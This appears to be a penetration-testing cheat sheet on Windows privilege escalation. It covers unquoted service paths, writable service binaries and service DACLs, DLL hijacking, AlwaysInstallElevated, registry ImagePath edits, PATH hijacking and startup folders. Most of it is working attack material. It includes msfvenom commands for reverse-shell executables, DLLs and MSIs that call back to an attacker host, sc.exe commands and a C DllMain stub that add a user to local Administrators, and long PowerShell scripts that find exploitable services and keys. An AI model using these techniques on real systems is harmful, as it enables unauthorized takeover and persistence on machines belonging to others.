Service & Registry Exploits
Abusing misconfigured services, weak file permissions, unquoted paths, registry misconfigurations, and DLL hijacking to escalate privileges.
Unquoted Service Paths
If a service's binary path contains spaces and is not quoted, the service control manager tries each space-delimited prefix (with .exe appended) as the executable before it reaches the real one. Since most services run as LocalSystem, a binary dropped at one of those intermediate paths runs with those privileges the next time the service starts.
Detection
Find services with unquoted paths.
PS C:\> Get-WmiObject win32_service | Where-Object { $_.PathName -notlike '"*' -and $_.PathName -like '* *' } | Select-Object Name, PathName, StartName
PS C:\> wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\" | findstr /i /v """
Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-UnquotedService
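The detection commands above only list unquoted paths; they do not tell you which of the intermediate locations you can actually write to. The following is an added example (my code, not from the original page or from PowerUp): for every unquoted service path it builds the intercept candidates in the order Windows tries them and probes each candidate's directory by creating and deleting a file, which is more reliable than reading ACLs. Function and variable names are my own.

```powershell
# Added example (not from the original page). Function and variable names are my own.
# For every unquoted service path with spaces, list the intercept paths Windows would
# try before the real binary, and test whether the current user can really create a
# file at each one (a probe file is written and removed, so expect a file-audit event).

function Test-DirWritable([string]$Dir) {
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('.' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [System.IO.File]::Create($probe).Close()
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServiceTargets {
    Get-WmiObject Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notlike '"*' -and $_.PathName -like '* *' } |
        ForEach-Object {
            $svc = $_
            # Drop arguments: keep everything up to and including the first ".exe"
            $exe = $svc.PathName.Trim()
            if ($exe -match '^(.*?\.exe)') { $exe = $Matches[1] }
            $parts = $exe.Split(' ')
            # Candidates: "C:\Program.exe", "C:\Program Files\My.exe", ... (the real path is excluded)
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    StartMode = $svc.StartMode
                    Candidate = $candidate
                    Writable  = Test-DirWritable (Split-Path -Path $candidate -Parent)
                }
            }
        }
}

# Only writable candidates for services running as a privileged account are worth a payload
Get-UnquotedServiceTargets |
    Where-Object { $_.Writable -and $_.RunsAs -match 'LocalSystem|NT AUTHORITY' } |
    Format-Table -AutoSize
```

The StartMode column matters for the next step: if you cannot stop and start the service yourself, an Auto service still picks up the payload at the next reboot.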
Exploitation
Example: if the path is C:\Program Files\My App\service.exe, Windows tries, in order:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe
If you can write to C:\Program Files\My.exe, generate the payload on the attacking host:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o My.exe
Copy the payload to the writable location, then restart the service. In PowerShell, sc is an alias for Set-Content, so always call sc.exe explicitly.
PS C:\> copy My.exe "C:\Program Files\My.exe"
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> sc.exe start <SERVICE_NAME>
If you lack SERVICE_STOP/SERVICE_START on the service, check its StartMode: an Auto service runs at boot, so a reboot (shutdown /r /t 0, if you hold SeShutdownPrivilege) triggers the payload.
Check the permissions of each intermediate directory with icacls. You only need write access to one of the intermediate directories.
Writable Service Binary
If the current user can overwrite the binary that a service executes, replace it with a payload.
Detection
Check permissions on service binaries.
# Principals an unprivileged user normally holds, plus the current account; only ACEs granting F, M, W or WD to one of them count
$me = [regex]::Escape("$env:USERDOMAIN\$env:USERNAME")
$lowPriv = "(Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE|$me):.*\([^)]*\b(F|M|W|WD)\b[^)]*\)"
Get-WmiObject win32_service | Where-Object { $_.State -eq 'Running' } | ForEach-Object {
    # Extract the executable: the quoted part, else everything up to the first ".exe"
    $p = $_.PathName.Trim()
    if ($p.StartsWith('"')) { $path = $p.Split('"')[1] } elseif ($p -match '^(.*?\.exe)') { $path = $Matches[1] } else { $path = $p.Split(' ')[0] }
    $hits = icacls $path 2>$null | Select-String -Pattern $lowPriv
    if ($hits) { Write-Host "[VULN] $($_.Name) - $path"; $hits }
}
Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-ModifiableServiceFile
Exploitation
Stop the service first (a running executable cannot be overwritten), back up the original, replace it with the payload, and start the service again.
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> copy "C:\Path\To\service.exe" "C:\Path\To\service.exe.bak"
PS C:\> copy payload.exe "C:\Path\To\service.exe"
PS C:\> sc.exe start <SERVICE_NAME>
If you cannot stop the service, rename the running binary instead (Windows allows renaming a mapped executable, just not overwriting it), copy the payload to the original name, and wait for the next restart or reboot.
After getting a shell, restore the original.
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> copy "C:\Path\To\service.exe.bak" "C:\Path\To\service.exe"
PS C:\> sc.exe start <SERVICE_NAME>
Weak Service Permissions (Service Config Modification)
If you can modify a service’s configuration (change the binary path), point it to your payload.
Detection
Check whether the current user can modify the service. In the sdshow DACL, look for an allow ACE on a SID you hold (AU, BU, WD, IU or your own account) whose rights include DC (SERVICE_CHANGE_CONFIG), WD (WRITE_DAC), WO (WRITE_OWNER) or GA (GENERIC_ALL).
PS C:\> sc.exe qc <SERVICE_NAME>
PS C:\> sc.exe sdshow <SERVICE_NAME>
Via accesschk (SysInternals).
PS C:\> accesschk.exe /accepteula -uwcqv <USER> *
Via PowerUp.
PS C:\> . .\PowerUp.ps1
PS C:\> Get-ModifiableService
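sc.exe sdshow only prints the SDDL; deciding whether it is exploitable means reading the DACL against the SIDs your token actually carries. The following is an added example (my code, not from the original page or from PowerUp): it parses the DACL portion of an SDDL string, maps the two-letter service rights and SID aliases, honours explicit denies, and reports whether any SID in the current token holds CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL or GENERIC_WRITE. The function names and the sample SDDL are my own; the sample is constructed (not captured from a real host) so that BUILTIN\Users hold DC, which the check should flag.

```powershell
# Added example (not from the original page); function names and the sample SDDL are my own.
# Service rights as they appear in SDDL two-letter form
$RightName = @{
    'CC'='QUERY_CONFIG'; 'DC'='CHANGE_CONFIG'; 'LC'='QUERY_STATUS'; 'SW'='ENUM_DEPENDENTS'
    'RP'='START'; 'WP'='STOP'; 'DT'='PAUSE_CONTINUE'; 'LO'='INTERROGATE'; 'CR'='USER_DEFINED'
    'SD'='DELETE'; 'RC'='READ_CONTROL'; 'WD'='WRITE_DAC'; 'WO'='WRITE_OWNER'
    'GA'='GENERIC_ALL'; 'GW'='GENERIC_WRITE'; 'GR'='GENERIC_READ'; 'GX'='GENERIC_EXECUTE'
}
# The same rights as bit masks, for ACEs written as 0x... instead of letter pairs
$RightMask = @{ 'CHANGE_CONFIG'=0x2; 'WRITE_DAC'=0x40000; 'WRITE_OWNER'=0x80000
                'GENERIC_ALL'=0x10000000; 'GENERIC_WRITE'=0x40000000 }
# Rights that let you rewrite binPath=, directly or by first re-ACLing the service
$Dangerous = 'CHANGE_CONFIG', 'WRITE_DAC', 'WRITE_OWNER', 'GENERIC_ALL', 'GENERIC_WRITE'
# SDDL SID aliases commonly seen in service DACLs; anything else is already a raw SID
$SidAlias = @{ 'WD'='S-1-1-0'; 'AU'='S-1-5-11'; 'IU'='S-1-5-4'; 'SU'='S-1-5-6'; 'AN'='S-1-5-7'
               'BU'='S-1-5-32-545'; 'BA'='S-1-5-32-544'; 'SY'='S-1-5-18' }

function ConvertFrom-ServiceSddl([string]$Sddl) {
    # Only the DACL matters: it sits between "D:" and the optional "S:" (SACL)
    if ($Sddl -notmatch 'D:(?<dacl>.*?)(?:S:|$)') { throw "no DACL in '$Sddl'" }
    foreach ($m in [regex]::Matches($Matches['dacl'], '\(([^)]*)\)')) {
        # ACE layout: type;flags;rights;object_guid;inherit_guid;sid
        $f = $m.Groups[1].Value.Split(';')
        if ($f[2] -match '^0x[0-9a-f]+$') {
            $mask = [Convert]::ToInt64($f[2], 16)
            $rights = @($RightMask.Keys | Where-Object { ($mask -band $RightMask[$_]) -ne 0 })
        } else {
            $rights = @()
            for ($i = 0; $i + 1 -lt $f[2].Length; $i += 2) {
                $code = $f[2].Substring($i, 2)
                $name = $RightName[$code]; if (-not $name) { $name = $code }
                $rights += $name
            }
        }
        $sid = $f[5]; if ($SidAlias.ContainsKey($sid)) { $sid = $SidAlias[$sid] }
        [pscustomobject]@{ Type = $f[0]; Sid = $sid; Rights = $rights }
    }
}

function Test-ServiceReconfigurable([string]$Sddl, [string[]]$MySids) {
    $mine = ConvertFrom-ServiceSddl $Sddl | Where-Object { $MySids -contains $_.Sid }
    # An explicit deny of a right beats any allow of the same right
    $denied  = @($mine | Where-Object { $_.Type -eq 'D' } | ForEach-Object { $_.Rights })
    $allowed = @($mine | Where-Object { $_.Type -eq 'A' } | ForEach-Object { $_.Rights })
    $hits = @($allowed | Where-Object { $Dangerous -contains $_ -and $denied -notcontains $_ } | Sort-Object -Unique)
    [pscustomobject]@{ Reconfigurable = ($hits.Count -gt 0); Via = $hits }
}

# Constructed sample (not captured from a real host): BUILTIN\Users (BU) hold DC = CHANGE_CONFIG
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWLOCRRC;;;BU)' +
          'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Test-ServiceReconfigurable -Sddl $sample -MySids @('S-1-5-32-545', 'S-1-5-11')

# Live: every service, checked against the SIDs the current token actually carries
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
foreach ($svc in Get-Service) {
    $sddl = (sc.exe sdshow $svc.Name 2>$null | ForEach-Object { $_.Trim() } | Where-Object { $_ -match '^D:' }) -join ''
    if ($sddl) {
        $r = Test-ServiceReconfigurable -Sddl $sddl -MySids $mySids
        if ($r.Reconfigurable) { "[VULN] $($svc.Name): $($r.Via -join ', ')" }
    }
}
```

Comparing SIDs rather than names avoids misses on localized group names, and checking the whole token (not just the primary group) catches grants to Authenticated Users or INTERACTIVE that sc.exe qc never shows.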
Exploitation
Change the service binary path to your payload (the space after binpath= is required). Because the payload is not a real service, the SCM reports error 1053 on start and may kill the process after the start timeout, so keep the payload short-lived or have it spawn a detached child; it still runs as the service account.
PS C:\> sc.exe config <SERVICE_NAME> binpath= "C:\Temp\payload.exe"
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> sc.exe start <SERVICE_NAME>
Or add your user to local admins via the service.
PS C:\> sc.exe config <SERVICE_NAME> binpath= "cmd /c net localgroup Administrators <USER> /add"
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> sc.exe start <SERVICE_NAME>
Restore the original binpath (from the earlier sc.exe qc output) when done.
Via PowerUp (automated).
PS C:\> . .\PowerUp.ps1
PS C:\> Invoke-ServiceAbuse -Name '<SERVICE_NAME>'
Invoke-ServiceAbuse adds a local admin user by default (john / Password123!), restarting the service and restoring its original binPath afterwards. Use -UserName and -Password to choose your own, or -Command to run an arbitrary command instead.
DLL Hijacking
If a service or application loads a DLL from a directory you can write to, or looks for a DLL that does not exist anywhere on its search path, place a malicious DLL there. With SafeDllSearchMode (the default) the search order is: the application's own directory, System32, the 16-bit System directory, the Windows directory, the current directory, then each PATH directory. A writable application directory, or a DLL missing from all of these, is the target.
Detection
Find services with writable directories in their path.
$me = [regex]::Escape("$env:USERDOMAIN\$env:USERNAME")
$lowPriv = "(Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE|$me):.*\([^)]*\b(F|M|W|WD)\b[^)]*\)"
Get-WmiObject win32_service | ForEach-Object {
    $p = $_.PathName.Trim()
    if ($p.StartsWith('"')) { $path = $p.Split('"')[1] } elseif ($p -match '^(.*?\.exe)') { $path = $Matches[1] } else { $path = $p.Split(' ')[0] }
    # The binary's own directory is first in the DLL search order, so a writable one beats any missing DLL
    $dir = Split-Path -Path $path -Parent
    $hits = icacls $dir 2>$null | Select-String -Pattern $lowPriv
    if ($hits) { Write-Host "[VULN] $($_.Name) - $dir"; $hits }
}
Use Process Monitor (procmon) to find missing DLLs: filter on Result is NAME NOT FOUND and Path ends with .dll, and add the User column so you only chase loads made by privileged processes.
Common targets: application directories under C:\Program Files with weak ACLs, and any PATH directories that are writable.
Exploitation
Generate a malicious DLL.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o hijacked.dll
Place it in the writable directory under the expected filename (the DLL's architecture must match the host process), then restart the service.
PS C:\> copy hijacked.dll "C:\Path\To\Writable\Dir\expected.dll"
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> sc.exe start <SERVICE_NAME>
DLL Proxying
For DLLs that are already loaded (not missing), create a proxy DLL that forwards legitimate calls to the original while executing your payload.
// Minimal hijack stub. Compile with: x86_64-w64-mingw32-gcc -shared -o hijacked.dll proxy.c
// It only runs the payload. For a real proxy, rename the original (e.g. expected_orig.dll) and
// forward every export to it (MSVC: one #pragma comment(linker, "/export:Name=expected_orig.Name")
// per export; SharpDLLProxy generates these lines from the original's export table).
#include <windows.h>
#include <stdlib.h>
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    (void)hinstDLL; (void)lpvReserved;
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Runs under the loader lock: keep it short and do not wait on other DLLs
        system("cmd /c net localgroup Administrators <USER> /add");
    }
    return TRUE;
}
Use SharpDLLProxy to automate the forwarding.
Registry Exploits
AlwaysInstallElevated
If the AlwaysInstallElevated value is 1 under both HKLM and HKCU, Windows Installer runs every MSI with SYSTEM privileges, regardless of who starts it.
Detection.
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
PS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploitation (both queries must return 0x1). Generate the MSI on the attacking host; PowerUp's Write-UserAddMSI builds one that adds a local admin instead of a reverse shell.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f msi -o evil.msi
PS C:\> msiexec /quiet /qn /i evil.msi
AutoRun Programs
If a program is configured to auto-run from a Run/RunOnce key and its binary is writable, replacing it gives code execution as whichever user logs on next. HKLM entries run for every user, including administrators (with a medium-integrity token under UAC, so pair this with a UAC bypass if needed).
Detection.
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
PS C:\> reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
PS C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Check write permissions on the referenced binaries.
# For each binary found in the registry keys above
PS C:\> icacls "C:\Path\To\autorun.exe"
Exploitation: replace the binary, then wait for the next logon (or reboot).
Registry Service Permissions
If you can modify a service's registry key, change its ImagePath; the new value is read the next time the service starts.
Detection.
PS C:\> Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\<SERVICE_NAME>" | Format-List
Broader search for writable service registry keys.
PS C:\> accesschk.exe /accepteula -uvwqks HKLM\System\CurrentControlSet\Services
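When accesschk is not available, the same check can be done natively. The following is an added example (my code, not from the original page): it walks every key under Services, resolves each allow ACE to a SID, and reports keys where a SID in the current token holds SetValue, WriteKey, ChangePermissions, TakeOwnership or FullControl, together with the service type and account so you can skip drivers. Function and variable names are my own.

```powershell
# Added example (not from the original page); function and variable names are my own.
# List service keys whose DACL grants a SID in the current token enough to rewrite ImagePath.
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
# SetValue/WriteKey change ImagePath directly; ChangePermissions/TakeOwnership let you grant yourself that first
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue,WriteKey,ChangePermissions,TakeOwnership,FullControl'

function Get-WritableServiceKey {
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Compare SIDs, not names, so localized or domain group names resolve correctly
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($mySids -notcontains $sid) { continue }
            if (($ace.RegistryRights -band $WriteRights) -eq 0) { continue }
            $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Type      = $props.Type        # 16/32 = Win32 service; 1/2 = driver (an ImagePath edit will not load unsigned code)
                RunsAs    = $props.ObjectName
                ImagePath = $props.ImagePath
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
            }
        }
    }
}

Get-WritableServiceKey | Format-Table -AutoSize
```

Most service keys only carry ACEs inherited from the Services key itself, which grant Users read access; a key that appears here has been re-ACLed by an installer, which is exactly the misconfiguration this section targets.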
Exploitation.
PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\<SERVICE_NAME>" -Name ImagePath -Value "C:\Temp\payload.exe"
PS C:\> sc.exe stop <SERVICE_NAME>
PS C:\> sc.exe start <SERVICE_NAME>
PATH Hijacking
If a writable directory appears in the system PATH before the directory of a binary that a privileged process launches by bare name, a payload with that name in the writable directory runs instead. CreateProcess searches the application's directory and the system directories before PATH, so this mainly catches binaries that live outside System32 (third-party tools called by services or scheduled tasks).
Detection
Check the PATH for writable directories.
$me = [regex]::Escape("$env:USERDOMAIN\$env:USERNAME")
$lowPriv = "(Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE|$me):.*\([^)]*\b(F|M|W|WD)\b[^)]*\)"
# Services and SYSTEM use the machine PATH, not the current user's merged $env:Path
[Environment]::ExpandEnvironmentVariables([Environment]::GetEnvironmentVariable('Path', 'Machine')) -split ';' | Where-Object { $_ } | ForEach-Object {
    $hits = icacls $_ 2>$null | Select-String -Pattern $lowPriv
    if ($hits) { Write-Host "[WRITABLE] $_" }
}
Exploitation
Identify a binary that a service or scheduled task calls without a full path, then place your payload in the writable PATH directory with the same name.
PS C:\> copy payload.exe "C:\Writable\Path\Dir\target_binary.exe"
Startup Applications
Detection
Check startup folders for writable locations.
PS C:\> icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
PS C:\> icacls "C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Exploitation
If the all-users startup folder is writable, drop a payload there. It executes on next logon.
PS C:\> copy payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"